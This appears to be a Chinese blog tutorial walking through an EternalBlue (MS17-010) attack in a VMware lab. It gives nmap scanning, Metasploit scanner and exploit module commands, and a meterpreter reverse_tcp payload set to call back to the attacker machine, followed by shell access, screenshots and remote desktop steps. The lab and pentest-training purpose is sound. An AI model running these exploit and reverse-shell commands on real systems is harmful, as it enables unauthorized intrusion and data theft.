基础设施
漏洞名:永恒之蓝
利用端口:445
软件:VMware17.5.1
攻击机:kali 192.168.2.128
靶机:win7 192.168.2.6
前提:
两机能互相ping通
内网渗透流程:
1)前期交互
确定目标,与kali同一个局域网的主机
查看网络配置
kali
ifconfigwin7
ipconfig
kali网络配置

win7网络配置

互相ping通


2)情报收集
nmap(上帝之眼)扫描
kali (192.168.2.128)
需要进入root权限,才好操作命令,否则有些命令会有问题
sudo su扫描网段内的存活ip和端口开放情况
┌──(root💀kali)-[/home/kali] └─# nmap -T4 -A -v -Pn 192.168.2.0/24
可以看到,会扫描整个网段的ip,发现445端口可以利用,win7的IP为2.6
![]()
也可以看到windows(被攻击机)的系统

3)威胁建模
根据情报收集,发现win7+445,绝配,可以利用ms17-010永恒之蓝的漏洞

4)漏洞分析
进入msfconsole的终端(msf,大多数人会直接说成是美少妇,所以,就这样)
┌──(root💀kali)-[/home/kali] └─# msfconsole
查找ms17-010渗透攻击模块
msf6 > search ms17-010
利用测试接口探查主机是否存在永恒之蓝漏洞
可以直接用数字来代表后面的数字,不用打那么多东西
msf6 > use 3
查看要配置的参数
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
required是要求的意思,有yes就是要写的意思
需要配置的参数
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.6win7,被攻击的主机为192.168.2.6,rhost为目标主机,rport是目标主机的端口号,
再查看一下参数是否配置好了
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
启动
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
5)渗透攻击
知道有漏洞后,输入use 0进入攻击接口
use 0

再查看一番参数
show options
发现目标主机要设置

、并且因为上面显示没有payload,所以也要配置,把攻击机端口lport也配了吧
![]()
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.2.128
set lport 5555
show options

lport这个没啥大的要求,设置得大点就好,但是也别是8080,8081,21,23这些端口,这些是别的程序要用的
然后,启动
run


这两个都是成功得标志
6)后渗透利用
攻击
1.进入对方shell
shell

2.改变编码方式
C:\Windows\system32>chcp 65001

3.退出win模式
ctrl+C,然后输入y,回车就OK了

4.桌面截图
screenshot

5.查看权限
getuid

6.远程登录
这个不是很推荐,因为你在kaili登上后,win7就会退出来,重新登录进去,所以就会打草惊蛇了,但是,也i写上去吧,注意:登陆win7的账号得是win7已有得账号。
192.168.2.6是win7的IP地址
rdesktop 192.168.2.6

7)报告
现在就是形成文档阶段的工作了,告诉客户漏洞利用得地方,漏洞的危害,造成的影响以及修复方法,像这篇的,修复方法就有升级系统或者给系统打补丁。
好困了,后续如果有补充的话会看看吧,可能也会整理一些metasploit的一些攻击命令!
Metasploit 渗透攻击模块解释
0 auxiliary/admin/smb/ms17_010_command // 扫描 445 在线主机,直接执行命令,需要漏洞主机的用户名和密码参数
1 auxiliary/scanner/smb/smb_ms17_010 // 永恒之蓝扫描模块,扫描某个网段
内是否存在 ms17_010 漏洞
2 exploit/windows/smb/ms17_010_eternalblue // 永恒之蓝漏洞利用/攻击模块3 exploit/windows/smb/smb_doublepulsar_rce //SMB 后 门 , 用 于 利 用
DoublePulsar 漏洞实现 SMB 远程代码执行
4 exploit/windows/smb/ms17_010_psexec //直接利用获得 meterpreter 会话,
需要提供用户名和密码参数
余着了......





1万+

被折叠的 条评论
为什么被折叠?



